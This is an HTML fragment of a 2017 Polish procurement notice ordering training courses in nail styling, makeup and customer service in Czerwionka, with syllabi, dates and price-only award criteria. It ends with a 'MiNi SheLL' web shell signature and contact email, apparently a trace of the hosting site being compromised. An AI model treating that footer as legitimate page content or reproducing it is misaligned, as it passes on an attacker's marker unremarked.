                      data zakończenia: 30/03/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b><br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenie szkolenia w specjalności stylista paznokci.
Liczba uczestników: 6 osób.
Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie szkolenia w wymiarze nie mniejszym niż 80 godzin lekcyjnych w oparciu o program szkolenia niezbędny do nabycia kompetencji.
2)Program szkolenia winien zawierać:
 Budowa paznokcia naturalnego
 Choroby paznokci
 Manicure metodą biologiczną
 Nauka profesjonalnego malowania płytki paznokcia
 Wzornictwo tradycyjne za pomocą lakierów
 Masaż dłoni i zabiegi pielęgnacyjne
 Nakładanie żelu/akrylu
 Zabieg uzupełniający
 Wzmocnienie naturalnych paznokci (żel, akryl)
 Usuwanie paznokci żelowych
 Reperacja złamanych i naderwanych paznokci
 Przedłużanie paznokci 
 Naklejanie naklejek, cyrkonii
 Przepisy BHP na stanowisku pracy
3)Celem szkolenia jest teoretyczne i praktyczne przygotowanie uczestników szkolenia do wykonywania zawodu w w/w zakresie, które profesjonalnie i od podstaw przygotuje do zawodu stylisty paznokci, oraz w praktyczny sposób nauczy zagadnień wymaganych w pracy zawodowej jako stylista paznokci, da pełną swobodę posługiwania się wszystkimi preparatami kosmetycznymi, zapozna również uczestników z nowościami pojawiającymi się na rynku.
4)Zajęcia teoretyczne i praktyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
5)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
6)Termin zakończenia szkolenia i egzaminów ustala się na dzień 24 lutego 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Przeprowadzenie szkolenia w specjalności wizażysta / stylista<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenie szkolenia w specjalności wizażysta / stylista.
Liczba uczestników: 2 osoby.
Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)	Przeprowadzenie szkolenia w wymiarze nie mniejszym niż 50 godzin lekcyjnych w oparciu o program szkolenia niezbędny do nabycia kompetencji.
2)	Program szkolenia winien zawierać.
	Podstawy kosmetologii na potrzeby wizażu.
Budowa, skład, choroby skóry, włosów i paznokci
Makijaż- techniki, rodzaje, makijaż okolicznościowy
Stylizacja paznokci- techniki, rodzaje zdobień, dekoracje okolicznościowe
Dobór fryzur, układanie włosów, codzienne i okazjonalne
Stylizacja i dobór kolorystki w ubiorze, makijażu i fryzurze
Akcesoria i kosmetyki wykorzystywane w stylizacji i wizażu
Kreowanie wizerunku pracownicy, komunikacja z klientem
Przepisy BHP na stanowisku pracy
Organizacja, przystosowanie stanowiska pracy stylistki-wizażystki, dobór urządzeń i wyposażenia
3)Zajęcia teoretyczne i praktyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
4)Uczestnikami szkolenia mogą być inne osoby. Wykonawca może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
5)Termin rozpoczęcia szkolenia ustala się na dzień 27 lutego 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 7 marca 2017r.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 07/03/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Przeprowadzenie szkolenia z obsługi klienta i techniki sprzedaży<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przeprowadzenie szkolenia z obsługi klienta i techniki sprzedaży.
Liczba uczestników: 14 osób.
Wykonawca zorganizuje i przeprowadzi szkolenie w następującym zakresie: 
1)Przeprowadzenie szkolenia w wymiarze nie mniejszym niż 40 godzin lekcyjnych w oparciu o program szkolenia niezbędny do nabycia kompetencji.
2)Szkolenie winno zostać przeprowadzone w 2 grupach szkoleniowych, przy czym liczebność grupy nie może przekraczać 7 osób,

3)Program szkolenia winien zawierać zagadnienia:
psychologii sprzedaży,
techniki sprzedaży,
profesjonalna obsługa klienta,
prezentacja produktów i usług,
umiejętność komunikacji z Klientem,
skuteczna negocjacja.
4)Zajęcia teoretyczne i praktyczne będą odbywać się w salach zapewnionych przez Wykonawcę na terenie dzielnicy Czerwionka. 
5)Uczestnikami szkolenia mogą być tylko uczestnicy projektu. Wykonawca nie może łączyć zajęć prowadzonych na zlecenie Zamawiającego z innymi zajęciami. 
6)Termin rozpoczęcia szkolenia ustala się na dzień 21 marca 2017 r., a zakończenia szkolenia i egzaminów ustala się na dzień 28 marca 2017r. Za pisemna zgodą Zamawiającego zajęcia mogą odbyć się w innych terminach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80530000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 28/03/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com